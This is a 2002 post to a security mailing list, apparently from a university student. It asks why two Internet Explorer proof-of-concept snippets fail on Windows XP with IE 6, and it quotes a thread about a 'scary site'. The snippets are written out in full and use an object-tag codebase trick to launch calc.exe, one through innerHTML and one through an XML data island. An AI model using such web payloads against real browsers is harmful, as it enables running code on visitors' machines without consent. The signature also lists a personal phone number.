I' m using winXP with IE 6.0 but i think it seems it doesn't work.
if someone wants to reply send only to me otherwise i may not be able to see
your messages.
codes i have used:
<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>';
</script>
and:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
>From: "J.D." <[EMAIL PROTECTED]>
>To: <[EMAIL PROTECTED]>
>Subject: RE: scary site
>Date: Thu, 7 Mar 2002 15:00:57 -0600
>MIME-Version: 1.0
>Received: from [66.38.151.27] by hotmail.com (3.2) with ESMTP id
>MHotMailBE5251B000244004315A4226971B99AC0; Fri, 08 Mar 2002 10:45:05 -0800
>Received: from lists.securityfocus.com (lists.securityfocus.com
>[66.38.151.19])by outgoing.securityfocus.com (Postfix) with QMQPid
>B69E9A30A6; Fri, 8 Mar 2002 10:25:18 -0700 (MST)
>Received: (qmail 555 invoked from network); 7 Mar 2002 21:01:04 -0000
>From security-basics-return-9335-onurbuyukceran Fri, 08 Mar 2002 10:46:07
>-0800
>Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
>Precedence: bulk
>List-Id: <security-basics.list-id.securityfocus.com>
>List-Post: <mailto:[EMAIL PROTECTED]>
>List-Help: <mailto:[EMAIL PROTECTED]>
>List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
>List-Subscribe: <mailto:[EMAIL PROTECTED]>
>Delivered-To: mailing list [EMAIL PROTECTED]
>Delivered-To: moderator for [EMAIL PROTECTED]
>Message-ID: <000a01c1c61b$3cd9d510$c80fa8c0@CHEF>
>In-Reply-To: <[EMAIL PROTECTED]>
>
>Yes, IE6 on WinXP is vulnerable. I just finished testing it.
>
>J.D. Meek
>
>-----Original Message-----
>From: Snow, Corey [mailto:[EMAIL PROTECTED]]
>Sent: Wednesday, March 06, 2002 12:32 PM
>To: 'leon'; [EMAIL PROTECTED]
>Subject: RE: scary site
>
>I'm going to have to retract my previous statement- I don't know if IE 6
>on
>WinXP is vulnerable, because the page in question was searching for
>cmd.exe
>in a standard location, which is not how I configure my system- to
>prevent
>just such an attack from suceeding.
>
>Sorry for the confusion,
>
>Corey Snow
>
> > -----Original Message-----
> > From: leon [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, March 05, 2002 9:30 AM
> > To: [EMAIL PROTECTED]
> > Subject: scary site
> >
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > http://www.liquidwd.freeserve.co.uk/
> >
> >
> > Try it with a windows machine and IE with all patches.
> >
> > Be afraid be very afraid.
> >
> > FYI this is for all those people who are think that just having a
> > firewall is enough.
> >
> > Guess what?
> >
> > This works through packet filter, stateful inspection and proxy
> > servers.
> >
> > Cheers,
> >
> > Leon
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
> >
> > iQA/AwUBPIUArNqAgf0xoaEuEQLn0wCgjtpLPuRxLbCscHrq32IjePeezf8AoI6t
> > T73+xCv/VhrCGDVDIVrFBqZl
> > =9gR6
> > -----END PGP SIGNATURE-----
> >
>
>#########################################################
>The information contained in this e-mail and subsequent attachments may
>be privileged,
>confidential and protected from disclosure. This transmission is
>intended for the sole
>use of the individual and entity to whom it is addressed. If you are
>not the intended
>recipient, any dissemination, distribution or copying is strictly
>prohibited. If you
>think that you have received this message in error, please e-mail the
>sender at the above
>e-mail address.
>#########################################################
>
==============================================
| |
/ )| ONUR BUYUKCERAN |( \
/ / | | \ \
_( (_ | Department of Math | _) )_
(((\ \>|_/-> Bogazici University, ISTANBUL <-|</ /)))
(\\\\ \_/ / TURKEY \ \_/ ////)
\ / Email - [EMAIL PROTECTED] \ /
\ _/ Phone - 0 532 470 19 02 |\_ /
/ /| ICQ - 449 84 214 | \ \
/ / | | \ \
/___/ ============================================== \___\
_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail.
http://www.hotmail.com
